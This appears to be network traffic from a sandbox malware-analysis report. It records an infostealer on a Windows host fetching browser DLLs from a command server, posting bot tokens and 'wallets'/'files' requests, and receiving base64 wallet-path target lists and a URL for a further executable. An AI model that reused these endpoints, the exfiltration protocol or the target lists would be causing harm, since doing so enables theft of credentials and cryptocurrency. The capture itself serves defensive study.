Nov 5, 2024 18:46:53.991329908 CET	1236	IN	Data Raw: 84 ac 00 00 00 8b 45 ec 04 04 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 03 32 14 0f 8b 4d e4 88 51 03 83 fe 04 74 74 8b 45 ec 04 05 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 Data Ascii: E}$7$7u]S2MQttE}$7$7u]S2MQt<E}$7$7u]S2]SEu0EMME)us) }
Nov 5, 2024 18:46:53.991338968 CET	212	IN	Data Raw: 66 0f 6f 35 e0 20 08 10 66 0f fe c6 f3 0f 5b c0 66 0f 70 fd f5 66 0f f4 e8 66 0f 70 ed e8 66 0f 70 c0 f5 66 0f f4 c7 66 0f 70 c0 e8 66 0f 62 e8 66 0f eb cd 66 0f 72 f3 17 66 0f fe de f3 0f 5b c3 66 0f 70 dc f5 66 0f f4 e0 66 0f 70 e4 e8 66 0f 70 Data Ascii: fo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU9UEuUM}]?uu]}9u}UM}]
Nov 5, 2024 18:46:53.991770029 CET	1236	IN	Data Raw: dc 8b 45 d0 85 c0 74 35 88 55 e8 89 ca 89 c1 c1 e9 03 89 4d c0 83 c1 04 39 4d d8 89 5d dc 0f 83 db 01 00 00 8a 5d e8 83 7d d8 00 0f 84 3c 03 00 00 89 f8 89 d7 2b 45 c0 e9 54 01 00 00 83 7d d8 04 0f 82 3a 03 00 00 0f b6 c9 89 4d ec 31 c0 89 d1 89 Data Ascii: Et5UM9M]]}<+ET}:M1}]fEUEEUD}4747EED}4}4EUEUu}<7
Nov 5, 2024 18:46:55.088170052 CET	94	OUT	GET /746f34465cf17784/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:55.367326975 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:55 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 5, 2024 18:46:56.002399921 CET	95	OUT	GET /746f34465cf17784/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:56.283534050 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 5, 2024 18:46:56.701478004 CET	91	OUT	GET /746f34465cf17784/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:56.980720997 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 5, 2024 18:46:58.989564896 CET	95	OUT	GET /746f34465cf17784/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:59.254324913 CET	95	OUT	GET /746f34465cf17784/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:46:59.332310915 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 5, 2024 18:46:59.881335020 CET	99	OUT	GET /746f34465cf17784/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 5, 2024 18:47:00.160547972 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:00 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 5, 2024 18:47:01.197436094 CET	203	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGC Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 5, 2024 18:47:01.975749016 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:47:02.043602943 CET	469	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFB Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 2d 2d 0d 0a Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="message"wallets------KKJJEBFCGDAKFIEBAAFB--
Nov 5, 2024 18:47:02.325308084 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 5, 2024 18:47:02.351622105 CET	467	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJE Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="message"files------DBAEGCGCGIEGDHIDHJJE--
Nov 5, 2024 18:47:02.676879883 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:47:02.690119028 CET	565	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
Nov 5, 2024 18:47:03.459563971 CET	202	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 5, 2024 18:47:03.523804903 CET	474	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKK Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"ybncbhylepme------AKJDGIEHCAEHIEBFBKKK--
Nov 5, 2024 18:47:03.805665016 CET	271	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:47:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50008	185.215.113.43	80	3608	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:48.002094984 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 5, 2024 18:46:48.733237028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 05 Nov 2024 17:46:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50013	34.107.221.82	80	3520	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:48.871778011 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Nov 5, 2024 18:46:49.468728065 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 04 Nov 2024 21:54:06 GMT Age: 71563 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Nov 5, 2024 18:46:59.522294044 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50026	34.107.221.82	80	3520	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 18:46:49.946362019 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 5, 2024 18:46:50.589196920 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Tue, 05 Nov 2024 00:16:26 GMT Age: 63024 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Nov 5, 2024 18:47:00.627046108 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
